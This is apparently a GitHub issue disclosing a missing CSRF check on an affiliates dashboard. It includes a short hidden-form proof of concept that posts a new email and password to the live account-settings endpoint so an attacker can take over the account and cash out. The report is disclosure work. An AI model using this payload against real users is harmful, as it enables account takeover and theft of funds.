We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Without CSRF, it is possible create a hidden form like this one:
<form method="post" action="https://affiliates.crisp.chat/dashboard/account/form/account/"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="password" value="123"> <input type="hidden" name="notify_balance" value="0"> </form>
then submit it on any user click, on the page where the form is, log in and cash out.
The text was updated successfully, but these errors were encountered:
(precondition: account holder needs to be already logged in to affiliates.crisp.chat)
affiliates.crisp.chat
Sorry, something went wrong.
Ref rwf2/Rocket#14
No branches or pull requests
Without CSRF, it is possible create a hidden form like this one:
then submit it on any user click, on the page where the form is, log in and cash out.
The text was updated successfully, but these errors were encountered: